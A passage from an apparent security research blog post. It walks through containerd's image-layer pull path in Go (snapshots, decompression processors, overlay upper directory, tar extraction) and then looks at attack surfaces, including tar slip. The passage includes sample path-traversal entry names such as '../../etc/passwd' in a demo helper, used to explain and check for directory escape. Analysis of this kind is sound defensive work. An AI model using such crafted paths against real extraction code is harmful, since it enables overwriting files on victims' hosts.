    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="n">o</span><span class="o">.</span><span class="n">mounts</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="n">info</span><span class="p">),</span> <span class="no">nil</span>
<span class="p">}</span>

<span class="k">func</span> <span class="p">(</span><span class="n">o</span> <span class="o">*</span><span class="n">snapshotter</span><span class="p">)</span> <span class="n">mounts</span><span class="p">(</span><span class="n">s</span> <span class="n">storage</span><span class="o">.</span><span class="n">Snapshot</span><span class="p">,</span> <span class="n">info</span> <span class="n">snapshots</span><span class="o">.</span><span class="n">Info</span><span class="p">)</span> <span class="p">[]</span><span class="n">mount</span><span class="o">.</span><span class="n">Mount</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="p">[]</span><span class="n">mount</span><span class="o">.</span><span class="n">Mount</span><span class="p">{</span> <span class="c">// [4]</span>
        <span class="p">{</span>
            <span class="n">Type</span><span class="o">:</span>    <span class="s">"overlay"</span><span class="p">,</span> <span class="c">// or "bind" ...</span>
            <span class="n">Source</span><span class="o">:</span>  <span class="s">"overlay"</span><span class="p">,</span>
            <span class="n">Options</span><span class="o">:</span> <span class="n">options</span><span class="p">,</span>
        <span class="p">},</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>So, before unpacking the layer, <code class="language-plaintext highlighter-rouge">sn.Prepare()</code> creates the snapshot directories that will hold the extracted layers.</p>

<h3 id="23-containerd-apply-handling">2.3. containerd Apply Handling</h3>

<p>The apply request is sent from <code class="language-plaintext highlighter-rouge">dockerd</code> to <code class="language-plaintext highlighter-rouge">containerd</code>.</p>

<p>On the <code class="language-plaintext highlighter-rouge">containerd</code> side, <code class="language-plaintext highlighter-rouge">Apply()</code> is called to handle the request. Internally, it repeatedly calls <code class="language-plaintext highlighter-rouge">GetProcessor()</code> [1], wrapping each new processor around the previous one, until the stream's media type is the plain (uncompressed) tar layer. Later, <code class="language-plaintext highlighter-rouge">apply()</code> is called with the wrapped IO stream [2], and reading from that stream is what ultimately drives the processor chain.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// plugins/services/diff/local.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">l</span> <span class="o">*</span><span class="n">local</span><span class="p">)</span> <span class="n">Apply</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">er</span> <span class="o">*</span><span class="n">diffapi</span><span class="o">.</span><span class="n">ApplyRequest</span><span class="p">,</span> <span class="n">_</span> <span class="o">...</span><span class="n">grpc</span><span class="o">.</span><span class="n">CallOption</span><span class="p">)</span> <span class="p">(</span><span class="o">*</span><span class="n">diffapi</span><span class="o">.</span><span class="n">ApplyResponse</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">for</span> <span class="n">_</span><span class="p">,</span> <span class="n">differ</span> <span class="o">:=</span> <span class="k">range</span> <span class="n">l</span><span class="o">.</span><span class="n">differs</span> <span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="n">ocidesc</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="n">differ</span><span class="o">.</span><span class="n">Apply</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">desc</span><span class="p">,</span> <span class="n">mounts</span><span class="p">,</span> <span class="n">opts</span><span class="o">...</span><span class="p">)</span> <span class="c">// &lt;--------</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="c">// core/diff/apply/apply.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">s</span> <span class="o">*</span><span class="n">fsApplier</span><span class="p">)</span> <span class="n">Apply</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">desc</span> <span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">,</span> <span class="n">mounts</span> <span class="p">[]</span><span class="n">mount</span><span class="o">.</span><span class="n">Mount</span><span class="p">,</span> <span class="n">opts</span> <span class="o">...</span><span class="n">diff</span><span class="o">.</span><span class="n">ApplyOpt</span><span class="p">)</span> <span class="p">(</span><span class="n">d</span> <span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">,</span> <span class="n">err</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">var</span> <span class="n">processors</span> <span class="p">[]</span><span class="n">diff</span><span class="o">.</span><span class="n">StreamProcessor</span>
    <span class="k">for</span> <span class="p">{</span>
        <span class="k">if</span> <span class="n">processor</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="n">diff</span><span class="o">.</span><span class="n">GetProcessor</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">processor</span><span class="p">,</span> <span class="n">config</span><span class="o">.</span><span class="n">ProcessorPayloads</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [1]</span>
            <span class="c">// [...]</span>
        <span class="p">}</span>
        <span class="n">processors</span> <span class="o">=</span> <span class="nb">append</span><span class="p">(</span><span class="n">processors</span><span class="p">,</span> <span class="n">processor</span><span class="p">)</span>
        <span class="k">if</span> <span class="n">processor</span><span class="o">.</span><span class="n">MediaType</span><span class="p">()</span> <span class="o">==</span> <span class="n">ocispec</span><span class="o">.</span><span class="n">MediaTypeImageLayer</span> <span class="p">{</span>
            <span class="k">break</span>
        <span class="p">}</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
    <span class="n">rc</span> <span class="o">:=</span> <span class="o">&amp;</span><span class="n">readCounter</span><span class="p">{</span>
        <span class="n">r</span><span class="o">:</span> <span class="n">io</span><span class="o">.</span><span class="n">TeeReader</span><span class="p">(</span><span class="n">processor</span><span class="p">,</span> <span class="n">digester</span><span class="o">.</span><span class="n">Hash</span><span class="p">()),</span>
    <span class="p">}</span>

    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">apply</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">mounts</span><span class="p">,</span> <span class="n">rc</span><span class="p">,</span> <span class="n">config</span><span class="o">.</span><span class="n">SyncFs</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [2]</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>How does <code class="language-plaintext highlighter-rouge">GetProcessor()</code> decide which decoder to use? It walks the registered handlers from the most recently registered to the oldest and uses the first one that accepts the stream's media type [3]. By default, at least one handler is registered: <code class="language-plaintext highlighter-rouge">compressedHandler</code> [4].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// core/diff/stream.go</span>
<span class="k">func</span> <span class="n">GetProcessor</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">stream</span> <span class="n">StreamProcessor</span><span class="p">,</span> <span class="n">payloads</span> <span class="k">map</span><span class="p">[</span><span class="kt">string</span><span class="p">]</span><span class="n">typeurl</span><span class="o">.</span><span class="n">Any</span><span class="p">)</span> <span class="p">(</span><span class="n">StreamProcessor</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">for</span> <span class="n">i</span> <span class="o">:=</span> <span class="nb">len</span><span class="p">(</span><span class="n">handlers</span><span class="p">)</span> <span class="o">-</span> <span class="m">1</span><span class="p">;</span> <span class="n">i</span> <span class="o">&gt;=</span> <span class="m">0</span><span class="p">;</span> <span class="n">i</span><span class="o">--</span> <span class="p">{</span>
        <span class="n">processor</span><span class="p">,</span> <span class="n">ok</span> <span class="o">:=</span> <span class="n">handlers</span><span class="p">[</span><span class="n">i</span><span class="p">](</span><span class="n">ctx</span><span class="p">,</span> <span class="n">stream</span><span class="o">.</span><span class="n">MediaType</span><span class="p">())</span> <span class="c">// [3]</span>
        <span class="k">if</span> <span class="n">ok</span> <span class="p">{</span>
            <span class="k">return</span> <span class="n">processor</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">stream</span><span class="p">,</span> <span class="n">payloads</span><span class="p">)</span>
        <span class="p">}</span>
    <span class="p">}</span>
    <span class="k">return</span> <span class="no">nil</span><span class="p">,</span> <span class="n">ErrNoProcessor</span>
<span class="p">}</span>

<span class="k">func</span> <span class="n">init</span><span class="p">()</span> <span class="p">{</span>
    <span class="n">RegisterProcessor</span><span class="p">(</span><span class="n">compressedHandler</span><span class="p">)</span> <span class="c">// [4]</span>
<span class="p">}</span>

<span class="k">func</span> <span class="n">RegisterProcessor</span><span class="p">(</span><span class="n">handler</span> <span class="n">Handler</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">handlers</span> <span class="o">=</span> <span class="nb">append</span><span class="p">(</span><span class="n">handlers</span><span class="p">,</span> <span class="n">handler</span><span class="p">)</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">compressedHandler()</code> calls <code class="language-plaintext highlighter-rouge">DiffCompression()</code> to determine the <strong>compression type</strong> from the media type [5]. If the stream is compressed, it returns a nested function that sets up the <strong>matching streaming decoder</strong> [6] and returns it wrapped in a processor.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// core/diff/stream.go</span>
<span class="k">func</span> <span class="n">compressedHandler</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">mediaType</span> <span class="kt">string</span><span class="p">)</span> <span class="p">(</span><span class="n">StreamProcessorInit</span><span class="p">,</span> <span class="kt">bool</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">compressed</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">images</span><span class="o">.</span><span class="n">DiffCompression</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">mediaType</span><span class="p">)</span> <span class="c">// [5]</span>
    <span class="c">// [...]</span>
    <span class="k">if</span> <span class="n">compressed</span> <span class="o">!=</span> <span class="s">""</span> <span class="p">{</span>
        <span class="k">return</span> <span class="k">func</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">stream</span> <span class="n">StreamProcessor</span><span class="p">,</span> <span class="n">payloads</span> <span class="k">map</span><span class="p">[</span><span class="kt">string</span><span class="p">]</span><span class="n">typeurl</span><span class="o">.</span><span class="n">Any</span><span class="p">)</span> <span class="p">(</span><span class="n">StreamProcessor</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">ds</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">compression</span><span class="o">.</span><span class="n">DecompressStream</span><span class="p">(</span><span class="n">stream</span><span class="p">)</span> <span class="c">// [6]</span>
            <span class="c">// [...]</span>
            <span class="k">return</span> <span class="o">&amp;</span><span class="n">compressedProcessor</span><span class="p">{</span>
                <span class="n">rc</span><span class="o">:</span> <span class="n">ds</span><span class="p">,</span>
            <span class="p">},</span> <span class="no">nil</span>
        <span class="p">},</span> <span class="no">true</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Going back to <code class="language-plaintext highlighter-rouge">Apply()</code>, the processor is wrapped as an IO stream and then passed to the platform-specific <code class="language-plaintext highlighter-rouge">apply()</code>.</p>

<p>In the Linux implementation, <code class="language-plaintext highlighter-rouge">apply()</code> in <code class="language-plaintext highlighter-rouge">apply_linux.go</code> decides which directory the extracted files are written to. For overlayfs, this is the upper directory [7, 8], whose actual path is <code class="language-plaintext highlighter-rouge">"snapshots/&lt;id&gt;/fs"</code> [9].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// core/diff/apply/apply_linux.go</span>
<span class="k">func</span> <span class="n">apply</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">mounts</span> <span class="p">[]</span><span class="n">mount</span><span class="o">.</span><span class="n">Mount</span><span class="p">,</span> <span class="n">r</span> <span class="n">io</span><span class="o">.</span><span class="n">Reader</span><span class="p">,</span> <span class="n">sync</span> <span class="kt">bool</span><span class="p">)</span> <span class="p">(</span><span class="n">retErr</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">switch</span> <span class="p">{</span>
    <span class="k">case</span> <span class="nb">len</span><span class="p">(</span><span class="n">mounts</span><span class="p">)</span> <span class="o">==</span> <span class="m">1</span> <span class="o">&amp;&amp;</span> <span class="n">mounts</span><span class="p">[</span><span class="m">0</span><span class="p">]</span><span class="o">.</span><span class="n">Type</span> <span class="o">==</span> <span class="s">"overlay"</span><span class="o">:</span>
        <span class="c">// [...]</span>
        <span class="n">path</span><span class="p">,</span> <span class="n">parents</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">getOverlayPath</span><span class="p">(</span><span class="n">mounts</span><span class="p">[</span><span class="m">0</span><span class="p">]</span><span class="o">.</span><span class="n">Options</span><span class="p">)</span> <span class="c">// [7]</span>
        <span class="c">// [...]</span>
        <span class="n">_</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="n">archive</span><span class="o">.</span><span class="n">Apply</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">path</span><span class="p">,</span> <span class="n">r</span><span class="p">,</span> <span class="n">opts</span><span class="o">...</span><span class="p">)</span> <span class="c">// &lt;--------</span>
        <span class="c">// [...]</span>
        <span class="k">return</span> <span class="n">err</span>
    <span class="c">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="k">func</span> <span class="n">getOverlayPath</span><span class="p">(</span><span class="n">options</span> <span class="p">[]</span><span class="kt">string</span><span class="p">)</span> <span class="p">(</span><span class="n">upper</span> <span class="kt">string</span> <span class="c">/* [8] */</span><span class="p">,</span> <span class="n">lower</span> <span class="p">[]</span><span class="kt">string</span><span class="p">,</span> <span class="n">err</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="c">// plugins/snapshots/overlay/overlay.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">o</span> <span class="o">*</span><span class="n">snapshotter</span><span class="p">)</span> <span class="n">upperPath</span><span class="p">(</span><span class="n">id</span> <span class="kt">string</span><span class="p">)</span> <span class="kt">string</span> <span class="p">{</span>
    <span class="k">return</span> <span class="n">filepath</span><span class="o">.</span><span class="n">Join</span><span class="p">(</span><span class="n">o</span><span class="o">.</span><span class="n">root</span><span class="p">,</span> <span class="s">"snapshots"</span><span class="p">,</span> <span class="n">id</span><span class="p">,</span> <span class="s">"fs"</span><span class="p">)</span> <span class="c">// [9]</span>
<span class="p">}</span>
</code></pre></div></div>
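
<p>Since the body of <code class="language-plaintext highlighter-rouge">getOverlayPath()</code> is elided above, here is a rough sketch of what extracting the upper and lower directories from overlayfs mount options can look like. <code class="language-plaintext highlighter-rouge">overlayDirs()</code> is a hypothetical helper, not the containerd implementation, and the paths in <code class="language-plaintext highlighter-rouge">main()</code> are made up.</p>

```go
package main

import (
	"errors"
	"fmt"
	"strings"
)

// overlayDirs is a hypothetical helper that pulls upperdir and lowerdir
// out of overlayfs mount options such as "upperdir=/a" or "lowerdir=/b:/c".
func overlayDirs(options []string) (upper string, lower []string, err error) {
	for _, o := range options {
		if v, ok := strings.CutPrefix(o, "upperdir="); ok {
			upper = v
		} else if v, ok := strings.CutPrefix(o, "lowerdir="); ok {
			// overlayfs separates stacked lower directories with ':'.
			lower = strings.Split(v, ":")
		}
	}
	if upper == "" {
		return "", nil, errors.New("upperdir not found in overlay options")
	}
	return upper, lower, nil
}

func main() {
	// Made-up paths following the "snapshots/<id>/fs" layout.
	opts := []string{
		"workdir=/var/lib/example/snapshots/3/work",
		"upperdir=/var/lib/example/snapshots/3/fs",
		"lowerdir=/var/lib/example/snapshots/2/fs:/var/lib/example/snapshots/1/fs",
	}
	upper, lower, err := overlayDirs(opts)
	if err != nil {
		panic(err)
	}
	fmt.Println("extract into:", upper)
	fmt.Println("parents:", lower)
}
```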

<p>Eventually, <code class="language-plaintext highlighter-rouge">applyNaive()</code> [10] is called to untar the diff.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// pkg/archive/tar.go</span>
<span class="k">func</span> <span class="n">Apply</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">root</span> <span class="kt">string</span><span class="p">,</span> <span class="n">r</span> <span class="n">io</span><span class="o">.</span><span class="n">Reader</span><span class="p">,</span> <span class="n">opts</span> <span class="o">...</span><span class="n">ApplyOpt</span><span class="p">)</span> <span class="p">(</span><span class="kt">int64</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">root</span> <span class="o">=</span> <span class="n">filepath</span><span class="o">.</span><span class="n">Clean</span><span class="p">(</span><span class="n">root</span><span class="p">)</span>
    <span class="c">// [...]</span>
    <span class="n">options</span><span class="o">.</span><span class="n">applyFunc</span> <span class="o">=</span> <span class="n">applyNaive</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="n">options</span><span class="o">.</span><span class="n">applyFunc</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">root</span><span class="p">,</span> <span class="n">r</span><span class="p">,</span> <span class="n">options</span><span class="p">)</span> <span class="c">// [10]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Here, I want to explain more about two terms: <strong>“diff”</strong> and <strong>“layer”</strong>, since they are basically the same thing but in different states.</p>

<p>The raw tar data we download from the remote registry is the <strong>layer</strong>, kept in the content store. To unpack it, the layer (a gzip-compressed tar file) is decompressed into a <strong>diff</strong>, which is a <strong>stream of the uncompressed tar</strong>. That diff stream is then read and untarred, and the extracted files are saved into an isolated directory (named by snapshot ID) managed by the snapshot plugin.</p>
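
<p>To make the two states concrete, the sketch below builds a tiny gzip-compressed tar in memory (the "layer"), decompresses it into a tar stream (the "diff"), and walks its entries. It uses only the Go standard library. <code class="language-plaintext highlighter-rouge">makeLayer()</code> and <code class="language-plaintext highlighter-rouge">readDiff()</code> are hypothetical helpers, and gzip is assumed as the compression format.</p>

```go
package main

import (
	"archive/tar"
	"bytes"
	"compress/gzip"
	"fmt"
	"io"
)

// makeLayer builds a tiny gzip-compressed tar in memory, standing in for a
// layer blob fetched from a registry.
func makeLayer(files map[string]string) ([]byte, error) {
	var buf bytes.Buffer
	gz := gzip.NewWriter(&buf)
	tw := tar.NewWriter(gz)
	for name, body := range files {
		hdr := &tar.Header{Name: name, Mode: 0o644, Size: int64(len(body)), Typeflag: tar.TypeReg}
		if err := tw.WriteHeader(hdr); err != nil {
			return nil, err
		}
		if _, err := tw.Write([]byte(body)); err != nil {
			return nil, err
		}
	}
	// Close the tar writer first so its trailer is flushed into gzip.
	if err := tw.Close(); err != nil {
		return nil, err
	}
	if err := gz.Close(); err != nil {
		return nil, err
	}
	return buf.Bytes(), nil
}

// readDiff decompresses the layer into the diff stream and collects the
// name and content of every entry in it.
func readDiff(layer []byte) (map[string]string, error) {
	diff, err := gzip.NewReader(bytes.NewReader(layer)) // layer -> diff
	if err != nil {
		return nil, err
	}
	defer diff.Close()

	out := map[string]string{}
	tr := tar.NewReader(diff) // diff -> entries
	for {
		hdr, err := tr.Next()
		if err == io.EOF {
			return out, nil
		}
		if err != nil {
			return nil, err
		}
		body, err := io.ReadAll(tr)
		if err != nil {
			return nil, err
		}
		out[hdr.Name] = string(body)
	}
}

func main() {
	layer, err := makeLayer(map[string]string{"etc/hostname": "demo\n"})
	if err != nil {
		panic(err)
	}
	files, err := readDiff(layer)
	if err != nil {
		panic(err)
	}
	for name, body := range files {
		fmt.Printf("%s: %q\n", name, body)
	}
}
```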

<h3 id="24-untar">2.4. untar</h3>

<p><code class="language-plaintext highlighter-rouge">applyNaive()</code> is the key function because it covers almost all of the tar extraction logic. It reads the next entry from the tar stream [1] and builds the target file path [2]. It then calls <code class="language-plaintext highlighter-rouge">createTarFile()</code> to extract the entry [3].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// pkg/archive/tar.go</span>
<span class="k">func</span> <span class="n">applyNaive</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">root</span> <span class="kt">string</span><span class="p">,</span> <span class="n">r</span> <span class="n">io</span><span class="o">.</span><span class="n">Reader</span><span class="p">,</span> <span class="n">options</span> <span class="n">ApplyOptions</span><span class="p">)</span> <span class="p">(</span><span class="n">size</span> <span class="kt">int64</span><span class="p">,</span> <span class="n">err</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">root</span> <span class="o">=</span> <span class="n">filepath</span><span class="o">.</span><span class="n">Clean</span><span class="p">(</span><span class="n">root</span><span class="p">)</span>
    <span class="c">// [...]</span>
    <span class="k">for</span> <span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="n">hdr</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">tr</span><span class="o">.</span><span class="n">Next</span><span class="p">()</span> <span class="c">// [1]</span>
        <span class="c">// [...]</span>
        <span class="n">ppath</span><span class="p">,</span> <span class="n">base</span> <span class="o">:=</span> <span class="n">filepath</span><span class="o">.</span><span class="n">Split</span><span class="p">(</span><span class="n">hdr</span><span class="o">.</span><span class="n">Name</span><span class="p">)</span>
        <span class="n">ppath</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="n">fs</span><span class="o">.</span><span class="n">RootPath</span><span class="p">(</span><span class="n">root</span><span class="p">,</span> <span class="n">ppath</span><span class="p">)</span>
        <span class="n">path</span> <span class="o">:=</span> <span class="n">filepath</span><span class="o">.</span><span class="n">Join</span><span class="p">(</span><span class="n">ppath</span><span class="p">,</span> <span class="n">filepath</span><span class="o">.</span><span class="n">Join</span><span class="p">(</span><span class="s">"/"</span><span class="p">,</span> <span class="n">base</span><span class="p">))</span> <span class="c">// [2]</span>
        <span class="c">// [...]</span>
        <span class="n">srcData</span> <span class="o">:=</span> <span class="n">io</span><span class="o">.</span><span class="n">Reader</span><span class="p">(</span><span class="n">tr</span><span class="p">)</span>
        <span class="n">srcHdr</span> <span class="o">:=</span> <span class="n">hdr</span>
        <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">createTarFile</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">path</span><span class="p">,</span> <span class="n">root</span><span class="p">,</span> <span class="n">srcHdr</span><span class="p">,</span> <span class="n">srcData</span><span class="p">,</span> <span class="n">options</span><span class="o">.</span><span class="n">NoSameOwner</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [3]</span>
            <span class="c">// [...]</span>
        <span class="p">}</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">createTarFile()</code> is a custom tar handler. It inspects the <strong>tar entry header</strong> to determine the file type, and then performs the corresponding file operation to extract the entry. For example, if the entry is a directory [4], <code class="language-plaintext highlighter-rouge">mkdir()</code> is called to create the target directory [5], unless a directory already exists at that path.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// pkg/archive/tar.go</span>
<span class="k">func</span> <span class="n">createTarFile</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">path</span><span class="p">,</span> <span class="n">extractDir</span> <span class="kt">string</span><span class="p">,</span> <span class="n">hdr</span> <span class="o">*</span><span class="n">tar</span><span class="o">.</span><span class="n">Header</span><span class="p">,</span> <span class="n">reader</span> <span class="n">io</span><span class="o">.</span><span class="n">Reader</span><span class="p">,</span> <span class="n">noSameOwner</span> <span class="kt">bool</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="k">switch</span> <span class="n">hdr</span><span class="o">.</span><span class="n">Typeflag</span> <span class="p">{</span>
    <span class="k">case</span> <span class="n">tar</span><span class="o">.</span><span class="n">TypeDir</span><span class="o">:</span> <span class="c">// [4]</span>
        <span class="c">// [...]</span>
        <span class="k">if</span> <span class="n">fi</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">os</span><span class="o">.</span><span class="n">Lstat</span><span class="p">(</span><span class="n">path</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="o">||</span> <span class="o">!</span><span class="n">fi</span><span class="o">.</span><span class="n">IsDir</span><span class="p">()</span> <span class="p">{</span>
            <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">mkdir</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="n">hdrInfo</span><span class="o">.</span><span class="n">Mode</span><span class="p">());</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [5]</span>
                <span class="k">return</span> <span class="n">err</span>
            <span class="p">}</span>
        <span class="p">}</span>
    <span class="c">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<h2 id="3-attack-surfaces">3. Attack Surfaces</h2>

<p>In the pull flow, the following two operations directly process attacker-controlled data:</p>
<ol>
  <li>Manifest/Index JSON parsing (<code class="language-plaintext highlighter-rouge">fetch()</code>)</li>
  <li>Tar extraction (<code class="language-plaintext highlighter-rouge">applyNaive()</code> / <code class="language-plaintext highlighter-rouge">createTarFile()</code>)</li>
</ol>

<p>The threat model here is that the attacker either compromises the registry server or publishes a crafted image manifest or layer tar file, which the victim then pulls.</p>

<h3 id="31-parse-json">3.1. Parse JSON</h3>

<p>Basically, the descriptor is fetched from the remote, so most of <code class="language-plaintext highlighter-rouge">desc.XXXX</code> is controllable by the attacker. However, I didn’t find anything useful or vulnerable, because those fields are used in very limited ways 😢.</p>

<h3 id="32-tar-extraction">3.2. Tar Extraction</h3>

<p>When it comes to tar extraction, the tar slip attack is the first technique that comes to my mind, but Docker does a pretty good job of mitigating this kind of problem.</p>
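
<p>As a reminder of what a tar slip looks like, the sketch below joins an untrusted entry name onto the extraction root without any checks and then tests whether the result still lies under the root. Both <code class="language-plaintext highlighter-rouge">naiveTarget()</code> and <code class="language-plaintext highlighter-rouge">escapes()</code> are hypothetical helpers for illustration, Unix-style paths are assumed, and the check is purely lexical, so it says nothing about symlinks already present on disk.</p>

```go
package main

import (
	"fmt"
	"path/filepath"
	"strings"
)

// naiveTarget joins an untrusted entry name onto root without any checks.
// filepath.Join cleans the result, so ".." components are resolved lexically
// and can walk out of root.
func naiveTarget(root, name string) string {
	return filepath.Join(root, name)
}

// escapes reports whether target lies outside root (lexical check only;
// it does not account for symlinks already present on disk).
func escapes(root, target string) bool {
	rel, err := filepath.Rel(root, target)
	if err != nil {
		return true
	}
	return rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator))
}

func main() {
	root := "/srv/root" // made-up extraction root
	for _, name := range []string{"etc/passwd", "../../etc/passwd"} {
		target := naiveTarget(root, name)
		fmt.Printf("%-20s -> %-22s escapes=%v\n", name, target, escapes(root, target))
	}
}
```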

<p><code class="language-plaintext highlighter-rouge">hdr.Name</code> is the path name extracted from the tar entry. It is first split into two parts: directory and filename. For example, <code class="language-plaintext highlighter-rouge">"../../../a"</code> becomes <code class="language-plaintext highlighter-rouge">"../../../"</code> and <code class="language-plaintext highlighter-rouge">"a"</code>. The directory part is then passed to <code class="language-plaintext highlighter-rouge">fs.RootPath()</code>, which resolves it to a full path under the extraction root.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// pkg/archive/tar.go</span>
<span class="k">func</span> <span class="n">applyNaive</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">root</span> <span class="kt">string</span><span class="p">,</span> <span class="n">r</span> <span class="n">io</span><span class="o">.</span><span class="n">Reader</span><span class="p">,</span> <span class="n">options</span> <span class="n">ApplyOptions</span><span class="p">)</span> <span class="p">(</span><span class="n">size</span> <span class="kt">int64</span><span class="p">,</span> <span class="n">err</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">ppath</span><span class="p">,</span> <span class="n">base</span> <span class="o">:=</span> <span class="n">filepath</span><span class="o">.</span><span class="n">Split</span><span class="p">(</span><span class="n">hdr</span><span class="o">.</span><span class="n">Name</span><span class="p">)</span>
    <span class="n">ppath</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="n">fs</span><span class="o">.</span><span class="n">RootPath</span><span class="p">(</span><span class="n">root</span><span class="p">,</span> <span class="n">ppath</span><span class="p">)</span>
    <span class="n">path</span> <span class="o">:=</span> <span class="n">filepath</span><span class="o">.</span><span class="n">Join</span><span class="p">(</span><span class="n">ppath</span><span class="p">,</span> <span class="n">filepath</span><span class="o">.</span><span class="n">Join</span><span class="p">(</span><span class="s">"/"</span><span class="p">,</span> <span class="n">base</span><span class="p">))</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>
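
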